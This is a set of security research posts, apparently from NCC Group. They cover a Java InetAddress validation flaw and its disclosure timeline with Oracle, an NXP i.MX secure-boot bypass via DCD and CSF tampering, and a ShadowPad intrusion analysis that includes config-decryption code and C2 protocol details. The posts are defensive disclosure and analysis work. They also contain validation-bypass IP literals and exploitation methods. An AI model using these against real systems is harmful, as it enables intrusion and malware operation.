         down changes for the April update, they request an extension to
         "postpone the fix to July CPU, to allow more time for testing."
3/24/22: NCC Group receives an automated issue tracker update email from
         [email protected] with a status of "Issue addressed in future
         release, backports in progress for supported releases, scheduled for a
         future CPU".
4/24/22: NCC Group receives an automated issue tracker update email from
         [email protected] with a status of "Issue addressed in future
         release, backports in progress for supported releases, scheduled for a
         future CPU".
5/24/22: NCC Group receives an automated issue tracker update email from
         [email protected] with a status of "Issue addressed in future
         release, backports in progress for supported releases, scheduled for a
         future CPU".
6/24/22: NCC Group receives an automated issue tracker update email from
         [email protected] with a status of "Issue addressed in future
         release, backports in progress for supported releases, scheduled for a
         future CPU".
7/24/22: NCC Group receives an automated issue tracker update email from
         [email protected] with a status of "Closed: Alert or CPU issued"
         and an additional note of "Addressed in: Pipeline for CPU".
8/11/22: NCC Group reviews the July 2022 CPU update
         (https://www.oracle.com/security-alerts/cpujul2022.html) and does not
         find any mention of the disclosed vulnerability. In further reviewing
         associated updates for Java 8 (8u341), 11 (11.0.16), 17 (17.0.4), and
         18 (18.0.2), NCC Group identifies a change named "Update
         java.net.InetAddress to Detect Ambiguous IPv4 Address Literals" within
         the "Other Notes" sections, which refer to a non-public issue,
         "JDK-8277608" (https://bugs.openjdk.org/browse/JDK-8277608). NCC Group
         identifies and reviews the commit introducing the change to the public
         https://github.com/openjdk/jdk repository,
         `cdc1582d1d7629c2077f6cd19786d23323111018`, and determines that the
         vulnerability has not been fixed and that the commit appears
         unrelated, simply introducing a non-security relevant breaking change
         that disables alternate numerical textual representations of IP
         addresses, such as hexadecimal and octal radixes referred to as
         "BSD-style". This change causes IP address strings such as
         "0x7f.016.0.0xa" (127.14.0.10), "0x7f000001" (127.0.0.1), or
         "017700000001" (127.0.0.1) to be rejected by default unless the
         `-Djdk.net.allowAmbiguousIPAddressLiterals=true` option is passed to
         `java`. It should be noted that this validation does not restrict
         purely numeric text representations such as "2130706433" or
         "02130706433" (both parsed to 127.0.0.1). Single segment octal
         representations are restricted when they cannot be parsed into valid
         addresses as decimal. This is due to Java's longtime improper handling
         of octal-based IP addresses, which requires at least one segment to be
         larger than the maximum value when parsed as decimal to trigger an
         octal parse. Due to this, octal-based IP addressed are often parsed
         as decimal by Java.
8/12/22: NCC Group emails both the [email protected] and
         [email protected] lists asking for the current timeline for
         the resolution of the issue, and provides the internal issue tracker
         ID. In the email, NCC Group includes a brief analysis of the "Update
         java.net.InetAddress to Detect Ambiguous IPv4 Address Literals"
         change, stating that it does not appear to be related to the disclosed
         vulnerability, which is still active in the updated releases of Java.
         Lastly, NCC Group states their intention to publish an advisory with
         with guidance for developers instead of waiting for a later CPU to
         resolve the vulnerability as the Oracle Security Alerts team had rated
         it with a CVSS score of 0.
9/14/22: The Oracle Security Alerts team replies to the previous email
         informing NCC Group and the [email protected] list that
         they "revisited the original report and learned that the issue
         reported was not addressed by the fixes released in the July CPU."
         They also stated that it was "too late to the fix into the upcoming
         2022 October CPU", and that they were "targeting the fix for the 2023
         January CPU." They additionally sought to determine if NCC Group would
         delay disclosure until after the January CPU was published.
9/22/22: NCC Group replies to Oracle Security Alerts team and the
         [email protected] list that waiting another 4-5 months far
         exceeds our disclosure policy. NCC Group also states their intention
         to publish an advisory on Sept 26, 2022, so that developers can
         mitigate the vulnerability within their codebases without an upstream
         patch.
9/23/22: The Oracle Security Alerts team replies on the thread thanking
         NCC Group for informing them of the decision to publish an advisory.
9/23/22: NCC Group receives an automated issue tracker update email from
         [email protected] with a status of "Under investigation / Being
         addressed in future and supported releases".
9/23/22: Late in the day, the Oracle Security Alerts team replies to
         NCC Group's most recent email, requesting additional time until
         noon PT on Wednesday, Sept 28, 2022, so that they can "work on a plan
         to get the fix into Oct CPU".
9/26/22: Early in the morning, NCC Group North America CTO, Dave Goldsmith,
         replies, stating that NCC Group tries "our best to work positively
         with vendors when disclosing vulnerabilities," and "that we've been
         pretty flexible" in handling the disclosure for this vulnerability.
         He offers an extension until Wednesday, Sept 28, 2022, at noon PT,
         but requests that the Oracle Security Alerts team re-evaluates the
         0.0 CVSS score of the vulnerability, as, if that remains Oracle's
         calculation, "then we don’t think it will be contentious to publish
         without a patch."
9/28/22: At 10:40am PT, the Oracle Security Alerts team replies stating that
         they "have confirmed the issue based on the report that was
         submitted" and that "the issue is a client side issue and there are
         ample best practices on input validation." They include reference
         links to an Oracle secure coding guide for Java
         (https://www.oracle.com/java/technologies/javase/seccodeguide.html),
         and the OWASP Top 10 entry on injection vulnerabilities
         (https://owasp.org/Top10/A03_2021-Injection/), the latter of which
         states the following as its second bullet on prevention: "Use positive
         server-side input validation. This is not a complete defense".
         Additionally, the Oracle Security Alerts requested a proof-of-concept
         demonstrating a server-side attack to recalculate the CVSS score.
         However, the reply did not contain any mention of "a plan to to get
         the fix into Oct CPU" per the Oracle Security Alerts team's 9/23/22
         email. It should be noted that NCC Group considers this vulnerability
         to impact code that takes untrusted hostname strings as input, a group
         that primarily includes server-side applications and services, as it
         enables a trivial bypass to official Java input validation routines
         used to protect against injection-type issues.
10/4/22: NCC Group North America CTO, Dave Goldsmith, replies, providing
         examples of how server-side input validation based on the vulnerable
         API would result in server-side systems being exploitable, including
         an example of such vulnerable code implementing input validation for
         `ping`. He requests a clear answer from the Oracle Security Alerts on
         both re-evaluating the CVSS score given the provided examples, and a
         commitment to fix the vulnerability in the October CPU. He
         additionally states that if both are provided by close of business on
         Wednesday, October 5, 2022, NCC Group will hold off on publishing the
         advisory until the October CPU is published; otherwise, the advisory
         will be published on Thursday, October 6, 2022.
10/6/22: The Oracle Security Alerts team replies at 12:10am PT, stating that
         their "evaluation is that this is an input validation issue and we are
         scoring it as a CVSS 0" and that "[a]s mentioned earlier we are
         targeting to release defense-in-depth fixes in the January 2022
         Critical Patch Update."
10/6/22: NCC Group publishes this security advisory.
10/6/22: NCC Group replies on the thread informing the Oracle Security Alerts
         team and the [email protected] list that the advisory has
         been published.

Thanks to

Jennifer Fernick and Dave Goldsmith for their support throughout the disclosure process.

About NCC Group

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape.

With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face.

We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.


  1. https://github.com/openjdk/jdk/blob/jdk-17+35/src/java.base/share/classes/java/net/InetAddress.java#L1261↩

  2. https://cs.android.com/android/platform/superproject/+/android-12.0.0_r31:libcore/ojluni/src/main/java/java/net/InetAddress.java;l=1148↩

  3. https://cs.android.com/android/platform/superproject/+/android-12.0.0_r31:libcore/ojluni/src/main/java/java/net/Inet6AddressImpl.java;l=90↩

  4. https://cs.android.com/android/platform/superproject/+/android-12.0.0_r31:libcore/ojluni/src/main/java/java/net/Inet6AddressImpl.java;l=113;bpv=1;bpt=1↩

  5. https://cs.android.com/android/platform/superproject/+/android-12.0.0_r31:bionic/libc/dns/net/getaddrinfo.c;l=586↩

  6. https://cs.android.com/android/platform/superproject/+/android-12.0.0_r31:bionic/libc/dns/net/getaddrinfo.c;l=1015↩

  7. https://cs.android.com/android/platform/superproject/+/android-12.0.0_r31:bionic/libc/dns/net/getaddrinfo.c;l=1245↩

  8. https://cs.android.com/android/platform/superproject/+/android-12.0.0_r31:bionic/libc/bionic/net_if.cpp;drc=android-12.0.0_r31;l=56↩

Public Report – IOV Labs powHSM Security Assessment

5 October 2022 at 13:00

In June 2022, IOV Labs engaged NCC Group to perform a review of powHSM. Per the project documentation: “Its main role is to safekeep and prevent the unauthorized usage of each of the powPeg’s members’ private keys. powHSM is implemented as a pair of applications for the Ledger Nano S, namely a UI and a Signer, and it strongly depends on the device’s security features to implement the aforementioned safekeeping.”

In total, two consultants contributed 20 person days of effort over approximately five weeks. The assessment primarily focused on source code review, supplemented by 2 Ledger Nano S devices provided by IOV to facilitate testing.

In September 2022, the same consultants reviewed an updated version of the library
addressing the findings in this report. In general, all findings and major comments were
addressed by IOV and all documented findings are considered fixed.

The Public Report for this review may be downloaded below:

Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and CSF Tampering on NXP i.MX Devices

3 October 2022 at 17:56

NXP’s HABv4 API documentation references a now-mitigated defect in ROM-resident High Assurance Boot (HAB) functionality present in devices with HAB version < 4.3.7. I could find no further public documentation on whether this constituted a vulnerability or an otherwise “uninteresting” errata item, so I analyzed it myself!

This post shines new light on this old vulnerability, its exploitation on affected devices, and how it has been mitigated. Upon sharing our results with NXP PSIRT, our analysis was confirmed to be consistent with a vulnerability mitigated in 2017 and the security bulletin provided directly to customers back in 2017 was made publicly accessible (to our knowledge, for the first time).  The more we all collectively can learn about vulnerability patterns, the better – so I’m pleased with the outcome of this effort.

Vague Wording Piques Curiosity

The following excerpt is reproduced from the HABv4 API Reference Manual (dated 2018), included with the Code Signing Tool(Don’t worry, we’ll touch on what HAB and DCD are a bit later.)  Upon first reading this, it was unclear to me as to whether the phrase “incorrect authentication boot flow” was intended to be read synonymously with “a security vulnerability” or instead refer to a functional defect in which devices failed to boot signed code.

The DCD based SoC initialization mechanism should not be used once the boot process exits the ROM. The non-ROM user is required to only use the ‘Authenticate Image no DCD’ function if available, or make sure a null DCD pointer is passed as argument. Starting from HAB 4.3.7, the ‘Run DCD’ function, as well as the ‘Authenticate Image’ function called with a non-null DCD pointer, will return an error if called outside of the boot ROM. Older versions of HAB will run DCD commands if available, this could lead to an incorrect authentication boot flow.

I turned to the upstream U-Boot codebase to seek out any corresponding changes in HAB-related code.  A software mitigation for this issue was submitted to the U-Boot project by NXP and merged in upstream in commit 8c4037a0, prior to the U-Boot 2018.03 release. This commit, which rejects images containing non-NULL DCD pointers, includes the language about the risk of “an incorrect authentication boot flow” and highly recommends that this check be in place.  However, commit ca89df7d effectively reverts this patch (by changing the non-NULL DCD pointer check from an error to a warning) due to its potential to be a “breaking change” for users that have already deployed signed firmware, with the author citing a lack of prior guidance regarding the IVT’s DCD field. As a result, the mitigation was not included in an upstream U-Boot release until 2019.04 (a year later!) where commit b2ca8907 re-introduced the non-NULL DCD requirement.  Again, although references were made to documentation indicating that this check should be included to avoid “an incorrect authentication boot flow”, no discussion of this logic serving to mitigate a security vulnerability, as opposed to a functional defect, appeared to be present.

Neither official documentation nor forum posts seemed to shed light on whether there was truly a vulnerability here, so I decided to dive in further using an i.MX6ULL development kit that ships with U-Boot 2016.11 (i.e. without the upstream fixes).  This particular SoC contains HAB version 4.2 in its ROM, and thus would be affected by the documented issue.

Diving into the i.MX Image Format, DCD, and CSF sections

NXP i.MX 6/7/8M Application Processors (AP) provide High Assurance Boot (HAB) functionality to protect the integrity and authenticity of the first boot loader stage retrieved from non-volatile storage.  ROM-resident code at documented locations export HAB API functions, allowing successive boot stages to leverage ROM-based authentication functionality when extending the hardware-backed root of trust up through OS execution.

The cryptographically signed image format used by HAB-enabled NXP i.MX Application Processors is depicted in the high-level diagram included below. More detailed information can be found in the “Program Image” section of an i.MX AP’s corresponding Reference Manual (for example, Section 8.7 of IMX6ULZRM Rev 0). The details of which sections and fields are covered by a cryptographic signature, as well as when they are processed versus authenticated, is quite nuanced and therefore not summarized in the diagram. Multiple image layout examples can be found in AN4581 (requires login). Additional discussion can be found in the HABv4 RVT Guidelines and Recommendations application note (AN12263 – requires login), processors’ Security Reference Manuals (SRMs), as well as the user guide included with NXP’s Code Signing Tool.

The Device Configuration Data (DCD) image section, along with Command Sequence File (CSF) section, contain higher-level operations (“commands”) executed by the boot ROM to perform device configuration (e.g. DDR controller initialization) and image authentication, respectively.  Although they serve different purposes, the command structure, parsing logic, and function handler dispatch code within the ROM appear to be common to both.

The signature validation of the DCD and CSF sections occurs after (a subset of) their execution. I speculate that this behavior, inconsistent with modern security best practice, was necessary to support customer use-cases (perhaps in earlier chipset generations) in which an image larger than the available OCRAM had to be loaded into DDR memory before authentication could be performed. (A more recent alternative solution uses small U-Boot SPL images that can fit into OCRAM which can  bootstrap a much larger U-Boot “Proper.”)  As such, DCD commands to read, poll, and write to configuration register spaces are executed before there is an opportunity to authenticate them.  Similarly, portions of a CSF responsible for loading certificates and SRK tables are executed before the authentication operations (each their own command in the CSF) can be performed.


When executing the first ROM-resident loader, an allow-list of memory-mapped register ranges is enforced when executing DCD commands. This mechanism restricts memory write accesses to peripheral register regions deemed strictly necessary to support boot-time configuration. The allow-list also includes the “user” portion of OCRAM (i.e., that not used by the ROM) and DDR memory for a second stage loader to be deployed.  The DCD itself is copied to ROM-reserved OCRAM, and therefore is not self-modifiable. The same is true of the CSF, which generally contains an operation to authenticate itself prior the authentication of the rest of the image.

In order to support successive boot stages in extending the hardware-backed root of trust up through the execution of application software, NXP i.MX devices export HABv4 API functions at documented memory locations. For example, the U-Boot bootloader leverages this for its hab_auth_image command implementation, commonly used to authenticate boot-time assets such as a U-Boot Proper (from an SPL), the Linux kernel, one or more Device Tree binaries, or compressed ramdisk images loaded as part of “bootcmd” sequences.  A general secure boot flow is shown below.

However, when using the HAB API from a second-stage loader (e.g., U-Boot), the ROM’s allow-list is insufficient to mitigate risks arising from maliciously modified DCD and CSF image regions; the allow-list permits writes to the very OCRAM and/or DDR regions that the second stage loader is executing from.  As a result, it is possible to tamper with DCD and CSF files in a manner that modifies the currently executing second stage loader to suppress authentication failure handling logic and insert unauthorized code. I regard this as two separate vulnerabilities – one for DCD regions and one for CSF regions – and describe each in more detail in the following sections.

In order to exploit both vulnerabilities, an attacker would require write access to non-volatile (NV) storage (e.g., eMMC, NAND). This could be achieved either through physical access to a platform or through local access with sufficient privilege (e.g., tethered root) to perform the requisite NV storage write operations. 

Vulnerability #1: DCD Execution Permitted Outside of ROM Context in HAB < 4.3.7

Consider a U-Boot SPL or Proper image relying upon the HABv4 API to authenticate a kernel. In this use case, NXP intends for the image DCD pointer to be NULL in the image; at this point in execution, the secondary loader(s) are fully capable of performing any requisite configuration, so the use of DCD to do so would be redundantHowever, if an attacker tampers with an image to insert a DCD, malicious operations executed by the ROM-resident HABv4 API code will take effect before the HABv4 API returns an authentication failure status back to the RAM-resident second stage loaderDuring execution of the malicious DCD, the second stage loader can be patched to ignore an authentication failure or to execute custom code elsewhere. 

For example, an attacker may seek to leverage DCD modifications to patch U-Boot’s authenticate_image function (renamed to imx_hab_authenticate_image in U-Boot >= 2018.03) to always return success. In practice, however, the state of icache can interfere with this approachAs a proof-of-concept, I instead confirmed the vulnerability by patching entries in U-Boot’s command handler table for operations executed following an authentication failure.

The following bootcmd snippet, representative of those observed in fielded products, attempts to authenticate an image, and reboots the device upon encountering an authentication failure. (Note that hab_auth_img originally returned 1 for success; this was changed in later U-Boot versions to be more consistent with 0=success conventions.)

hab_auth_img $img $ivt_off || run boot_img $img; reset

Thus, control can be hijacked either by having the ROM’s DCD parser tamper with a function pointer in U-Boot’s command table or patching the do_reboot() implementation to simply return and fail open into a console.  The former can be used to jump to code deployed elsewhere in memory, while the latter is simpler if an otherwise inaccessible console environment contains permissive operations useful to an attacker.

Below is a Ghidra screenshot depicting the “reset” command table entry within a signed U-Boot image. 

The commented hex dump that follows contains the DCD operation that replaces the do_reset function pointer with the address of custom code included the payload.

Finally, the remainder of the DCD, included below, deploys a simple executable payload that prints a message and returns (i.e. “fails open”) to the U-Boot console.  Thus, when authentication fails and the aforementioned bootcmd string runs the “reset” command, the payload is instead executed.

Execution of the proof-of-concept exploit is shown below:

As mentioned in passing a few times, the mitigation for this vulnerability is to enforce the requirement that the DCD pointer is NULL when the ROM-resident HAB API is called outside of the boot ROM – i.e., from a second- or third-stage loader.  The U-Boot patches created by NXP implement this enforcement by adding logic before the HAB image authentication operation is invoked.  This logic checks an image for its DCD pointer value and fails out with an error if a non-NULL value is observed.  Documentation suggests that newer chipset versions contain an updated ROM-resident HAB library (>= version 4.3.7), which also implements this check. Nonetheless, I would recommend keeping the software-level mitigation in place just as a matter of defense-in-depth; for a modern U-Boot version, the check is already implemented so it’s no work to keep it as-is.

Vulnerability #2: Deprecated CSF Commands Permitted Outside of ROM Context

Although DCD and CSF sections serve fundamentally different purposes, they share a common Type-Length-Value (TLV) command scheme, and unsurprisingly, common parsing and function handler dispatch logic.  Until Code Signing Tool version 2.3.3 (dated 11/14/2017), it appears that the following operations were permitted in the INI-esque source representation of CSF sections:

  • Write Data – Write a specified value to a specified address
    Clear Mask – Variant of the above, clears specified bits
    Set Mask – Variant of the above, sets specified bits
  • Check Data – Test value at a specified address against a specified value mask, optionally polling
  • Set Manufacturing Identifier (MID) – Selects range of fuse locations to use as MID

Of course, in ROMs supporting the above operations within a CSF, it remains possible to manually craft CSF command sequence to execute these operations, despite newer Code Signing Tool refusing to generate these now-deprecated CSF commands when it parses the INI file representation of a CSF.

These commands, most notably “Write Data”, permit a nearly identical authentication bypass methodology as the one previously described.  However, instead of inserting a DCD into a signed image, an attacker can modify the CSF to include the “Write Data” command.  My strategy for a proof of concept was to append the binary payload to an image and patch the do_reset function pointer in the second-stage loader. Again, by the time control returns back to the second-stage loader, the OCRAM or DDR-resident bootloader code that would be responsible for handling an authentication failure will already have been modified by the maliciously crafted CSF.

Note that within the same U-Boot patch set noted earlier, NXP introduced a software-based mitigation that scans a CSF for the above deprecated operations and rejects an image if the deprecated operations are found.  This patch is available in U-Boot commit 20fa1dd3, which was included in the U-Boot 2018.03 release.  Due to time limitations, I have not confirmed that the “deprecated” CSF commands are now rejected by HAB >= 4.3.7. As such, I would again recommend keeping the software-level mitigation in place.

Additional Information from NXP PSIRT

I was certain that exploitable vulnerabilities were associated with this known issue, but still did not know whether NXP and its customers had treated this as a high impact boot-time security risk.  Out of an abundance of caution, I reached out to NXP PSIRT with a draft technical advisory, per the “Vendor Communication” timeline in the following section.

From my correspondence with NXP PSIRT, I learned that this had indeed been treated as a security risk back in 2017, with affected customers being sent a security bulletin.  Upon our request for access to this bulletin, NXP made this document public. It can now be found here (provided that one first creates an account on the NXP web site and agrees to the site EULA).

https://community.nxp.com/t5/Known-Limitations-and-Guidelines/Authentication-Vulnerability-when-extending-the-Root-of-Trust/ta-p/1511348

In general, the NXP support channel can be used to assist customers in acquiring any necessary security collateral.

As indicated by PSIRT and the security bulletin, NXP had created patches in its U-Boot forks for customers using their board support package (BSP) releases. These patches were included in the L4.9.88_2.0.0-ga release onward.  Below are links to the patches in NXP’s U-Boot fork.

For customers using earlier BSP releases, backported Yocto patches were also made available:

No CVEs or other vulnerability identifiers have been allocated by NXP for these issues.

Vendor Communication

2022-08-18 – Draft advisory submitted to NXP PSIRT per coordinated disclosure process.
2022-08-18 – NXP PSIRT acknowledges receipt of advisory.
2022-08-23 – NXP PSIRT indicates these issues were identified and fixed in GA releases in 2017, providing links to publicly accessible patches. NXP also indicates a security bulletin was released and that customers were notified at the time the issue was identified.
2022-08-24 - NCC Group requests security bulletin and vulnerability identifiers. NCC Group indicates intent to publish blog post covering both technical details and dissemination of mitigations into software ecosystems.
2022-08-26 – NXP PSIRT posts public version of security bulletin, provides this link to NCC Group, and answers NCC Group’s vulnerability identifier questions.
2022-08-29 – NCC Group acknowledges access to newly created public version of bulletin, inquires if NCC Group blog post can now be posted.
2022-09-02 – NXP PSIRT indicates that NCC Group may create a public document and requests to review a copy prior to publication.
2022-09-21 – NCC Group sends NXP PSIRT a blog post draft.
2022-09-30 - NXP PSIRT returns blog post feedback and minor correction.

Conclusion and an Open Question

By studying this older security vulnerability, we’ve had an opportunity to think about interesting circumstances that can arise when one boot stage leverages functionality provided by a prior boot stage. In particular, when ROM-resident code is shared between boot stages, it is important to bear in mind which boot stage the device is currently operating in.  Based upon this context, the domain of accessible assets, permissible operations, and memory-mapped accesses may need to be further restricted.

However, one open question continues to linger in my mind:  How many fielded devices are affected by this vulnerability and lack mitigations?  I doubt I’ll ever find an answer but speculate that there are at least few products out there.  (Hopefully if there are, they’ll pass by one of our desks during a security audit so we can check for it and recommend a fix.)

This question is not intended to cast doubt on NXP’s customer communication, but rather comes to mind due to the sheer complexity of embedded system supply chains.  If we assume that every affected customer acknowledged receipt of the 2017 security bulletin, there are quite a few other communication channels that can break down.  For example, a vendor selling their branded product may have purchased COTS modules to integrate into their product, adding only their own application software.  They are not necessarily NXP customers, and therefore would be relying on one or more OEMs to supply updates for vulnerability mitigations.  Even within organizations, it can be a challenge for information to propagate effectively from one engineering team to another. All this is to say, we frequently encounter unpatched systems with clients being unaware of vulnerabilities, and communication breakdowns can be just one of many reasons. I wouldn’t be surprised if you could point me to a device lacking mitigations for a 5-year-old vulnerability.

Acknowledgements

Thank you to Jeremy Boone, Jennifer Fernick, and Rob Wood for their always-appreciated, invaluable guidance and support.  Gratitude is also extended to NXP PSIRT for their support and responsiveness.

A glimpse into the shadowy realm of a Chinese APT: detailed analysis of a ShadowPad intrusion

Authors: William Backhouse (@Will0x04), Michael Mullen (@DropTheBase64) and Nikolaos Pantazopoulos

Summary

tl;dr

This post explores some of the TTPs employed by a threat actor who was observed deploying ShadowPad during an incident response engagement.

Below provides a summary of findings which are presented in this blog post:

  • Initial access via CVE-2022-29464.
  • Successive backdoors installed – PoisonIvy, a previously undocumented backdoor and finally ShadowPad.
  • Establishing persistence via Windows Services to execute legitimate binaries which sideloads backdoors, including ShadowPad.
  • Use of information gathering tools such as ADFind and PowerView.
  • Lateral movement leveraging RDP and ShadowPad.
  • Use of 7zip for data collection.
  • ShadowPad used for Command and Control. 
  • Exfiltration of data.

ShadowPad

This blog looks to build on the work of other security research done by SecureWorks and PwC with firsthand experience of TTPs used in a recent incident where ShadowPad was deployed. ShadowPad is a modular remote access trojan (RAT) which is thought to be used almost exclusively by China-Based threat actors.  

Attribution

Based on the findings of our Incident Response investigation, NCC Group assesses with high confidence that the threat actor detailed in this article was a China-based Advanced Persistent Threat (APT).

This is based on the following factors

  • ShadowPad – Public reporting has previously indicated the distribution of ShadowPad is tightly controlled and is typically exclusive to China-based threat actors for use during espionage campaigns.
  • TTPs – Specific TTPs observed during the attack were found to match those previously observed by China-based threat actors, both within NCC Group incident response engagements and the wider security community.
  • Activity pattern analysis – The threat actor was typically active during the hours of 01:00 – 09:00 (UTC) which matches the working hours of China

TTPs

Initial Access

A recent vulnerability in WSO2, CVE-2022-29464 [3], was the root cause of the incident. The actor, amongst other attackers, was able to exploit the vulnerability soon after it was published to create web shells on a server.

The actor leveraged a web shell to load a backdoor, in this case PoisonIvy. This was deployed via a malicious DLL and leveraged DLL Search Order Hijacking, a tactic which was continuously leveraged throughout the attack.

Execution

Certutil.exe was used via commands issued on web shells to install the PoisonIvy backdoor on patient zero.

The threat actor leveraged command prompt and PowerShell throughout the incident.

Additionally, several folders named _MEI<random digits> were observed within the Windows\Temp folder. The digits in the folder name change each time a binary is compiled. These folders are created on a host when a python executable is compiled. Within these folders were the .pyd library files and DLL files. The created time for these folders matched the last modified time stamp of the complied binary within the shimcache.

Persistence

Run Keys and Windows services were used throughout in order to ensure the backdoors deployed obtained persistence.

Defense Evasion

The threat actor undertook significant anti-forensic actions on ShadowPad related files to evade detection. This included timestomping the malicious DLL and applying the NTFS attributes of hidden and system to the files. Legitimate but renamed Windows binaries were used to load the configuration file. The threat actor also leveraged a legitimate Windows DLL, secur32.dll, as the name of the configuration file for the ShadowPad backdoor.

All indicators of compromise, aside from backdoor modules and loaders, were removed from the hosts by the threat actor.

Credential Access

The threat actor was observed collecting all web browser credentials from all hosts across the environment. It is unclear at this stage how this was achieved with the evidence available.

Discovery

A vast array of tooling was used to scan and enumerate the network as the actor negotiated their way through it, these included but were not limited to the following:

  • AdFind
  • NbtScan
  • PowerView
  • PowerShell scripts to enumerate hosts on port 445
  • Tree.exe

Lateral Movement

Lateral movement was largely carried out using Windows services, particularly leveraging SMB pipes. The only interactive sessions observed were onward RDP sessions to customer connected sites.

Collection

In addition to the automated collection of harvested credentials, the ShadowPad keylogger module was used in the attack, storing the keystrokes in encrypted database files for exfiltration. The output of which was likely included in archive files created by the attacker, along with the output of network scanning and reconnaissance.

Command and Control

In total, three separate command and control infrastructures were identified, all of which utilised DLL search order hijacking / DLL side loading. The initial payload was PoisonIvy, this was only observed on patient zero. The threat actor went on to deploy a previously undocumented backdoor once they gained an initial foothold in the network, this framework established persistence via a service called K7AVWScn, masquerading as an older anti-virus product. Finally, once a firm foothold was established within the network the threat actor deployed ShadowPad. Notably, the ShadowPad module for the proxy feature was also observed during the attack to proxy C2 communications via a less conspicuous server.

Exfiltration

Due to the exfiltration capabilities of ShadowPad, it is highly likely to have been the method of exfiltration to steal data from the customer network. This is further cemented by a small, yet noticeable spike in network traffic to threat actor controlled infrastructure.

Recommendations

  • Searches for the documented IOCs should be conducted
  • If IOCs are identified a full incident response investigation should be conducted

ShadowPad Technical Analysis

Initialisation phase 

Upon execution, the ShadowPad core module enters an initialisation phase at which it decrypts its configuration and determines which mode it runs. In summary, we identified the following modes: 

Mode ID  Description 
Injects itself to a specified process (specified in the ShadowPad configuration) and adds persistence to the compromised host.     In addition, if the compromised user belongs to a group with a SID starting with S-1-5-80- then the specified target process uses the token of ‘lsass’. 
Injects itself to a specified process (specified in the ShadowPad configuration) and executes the core code in a new thread.    In addition, if the compromised user belongs to a group with a SID starting with S-1-5-80 then the specified target process uses the token of ‘lsass’. 
Injects itself to a specified process (specified in the ShadowPad configuration).     In addition, if the compromised user belongs to a group with a SID starting with S-1-5-80 then the specified target process uses the token of ‘lsass’. 
16  Injects itself to a specified process (specified in the ShadowPad configuration) and creates/starts a new service (details are specified in the ShadowPad configuration), which executes the core code.     In addition, if the compromised user belongs to a group with a SID starting with S-1-5-80 then the specified target process uses the token of ‘lsass’. 
Table 1 – ShadowPad Modes

ANALYST NOTE: The shellcode is decrypted using a combination of bitwise XOR operations. 

Configuration storage and structure 

ShadowPad comes with an embedded encrypted configuration, which it locates by scanning its own shellcode (core module) with the following method (Python representation): 

for dword in range( len(data) ): 
  first_value = data[dword :dword+4] 
  second_value = data[dword+4:dword+8] 
  third_value = data[dword+8:dword+12] 
  fourth_value = data[dword+12:dword+16] 
  fifth_value = data[dword+16:dword+20] 
  sixth_value = data[dword+20:dword+24] 
 
  xor1 = int.from_bytes(second_value,'little') ^ 0x8C4832F1 
  xor2 = int.from_bytes(fourth_value,'little') ^ 0xC3BF9669 
  xor3 = int.from_bytes(sixth_value,'little') ^  0x9C2891BA 

  if xor1 == int.from_bytes(first_value,'little') and xor2 ==    int.from_bytes(third_value,'little') and xor3 == int.from_bytes(fifth_value,'little'): 
     print(f"found: {dword:02x}") 
     encrypted = data[dword:] 
     break 
 

After locating it successfully, it starts searching in it for a specified byte that represents the type of data (e.g., 0x02 represents an embedded module). In total, we have identified the following types: 

ID  Description 
0x02  Embedded ShadowPad module. 
0x80  ShadowPad configuration. It should start with the DWORD value 0x9C9D22EC. 
0x90  XOR key used during the generation of unique names (e.g., registry key name) 
0x91  DLL loader file data. 
0x92  DLL loader file to load. File might have random appended data (Depends on the config’s flag at offset 0x326). 
0xA0  Loader’s filepath 
Table 2 – Shadowpad Data Types 

Once one of the above bytes are located, ShadowPad reads the data (size is defined before the byte identifier) and appends the last DWORD value to the hardcoded byte array ‘1A9115B2D21384C6DA3C21FCCA5201A4’. Then it hashes (MD5) the constructed byte array and derives an AES-CBC 128bits key and decrypts the data. 

In addition, ShadowPad stores, in an encrypted format, the following data in the registry with the registry key name being unique (based on volume serial number of C:\) for each compromised host: 

  1. ShadowPad configuration (0x80) data. 
  2. Proxy configuration. Includes proxy information that ShadowPad requires. These are the network communication protocol, domain/IP proxy and the proxy port. 
  3. Downloaded modules. 

ShadowPad Network Servers 

ShadowPad starts two TCP/UDP servers at 0.0.0.0. The port(s) is/are specified in the ShadowPad configuration. These servers work as a proxy between other compromised hosts in the network. 

In addition, ShadowPads starts a raw socket server, which receives data and does one of the following tasks (depending on the received data): 

  1. Updates and sets proxy configuration to SOCKS4 mode. 
  2. Updates and sets proxy configuration to SOCKS5 mode. 
  3. Updates and sets proxy configuration to HTTP mode. 

Network Communication 

ShadowPad supports a variety of network protocols (supported by dedicated modules). For all of them, ShadowPad uses the same procedure to store and encrypt network data. The procedure’s steps are: 

  1. Compress the network data using the QuickLZ library module. 
  2. Generates a random DWORD value, which is appended to the byte array                  ‘1A9115B2D21384C6DA3C21FCCA5201A4’. Then, the constructed byte array is        hashed (MD5) and an AES-CBC 128bits key is derived (CryptDeriveKey). 
  3. The data is then encrypted using the generated AES key. In addition, Shadowpad        encrypts the following data fields using bitwise XOR operations: 
  1. Command/Module ID:  Command/Module ID ^  ( 0x1FFFFF * Hashing_Key – 0x2C7BEECE ) 
  2. Data_Size: Data_Size ^ ( 0x1FFFFFF * 0x7FFFFF * ( 0x1FFFFF * Hashing_Key – 0x2C7BEECE ) – 0x536C9757 – 0x7C06303F )  
  3. Command_Execution_State: Command_Execution_State ^ 0x7FFFFF * (0x1FFFFF * Hashing_Key – 0x2C7BEECE) – 0x536C9757 

As a last step, ShadowPad encapsulates the above generated data into the following        structure: 

struct Network_Packet 
{ 
 DWORD Hashing_Key; 
 DWORD Command_ID_Module_ID; 
 DWORD Command_Execution_State; //Usually contains any error codes. 
 DWORD Data_Size; 
 byte data[Data_Size]; 
}; 

If any server responds, it should have the same format as above. 

Network Commands and Modules 

During our analysis, we managed to extract a variety of ShadowPad modules with most of them having their own set of network commands. The table below summarises the identified commands of the modules, which we managed to recover. 

Module  Command ID  Description 
Main module  0xC49D0031               First command sent to the C2 if the commands fetcher function does not run in a dedicated thread. 
Main module  0xC49D0032   First command sent to the C2 if the commands fetcher function does run in a dedicated thread. 
Main module  0xC49D0033  Fingerprints the compromised host and sends the information to the C2. 
Main module  0xC49D0032  (Received) Executes the network command fetcher function in a thread. 
Main module      0xC49D0034               Sents an empty reply to the C2. 
Main module      0xC49D0037              Echoes the server’s reply. 
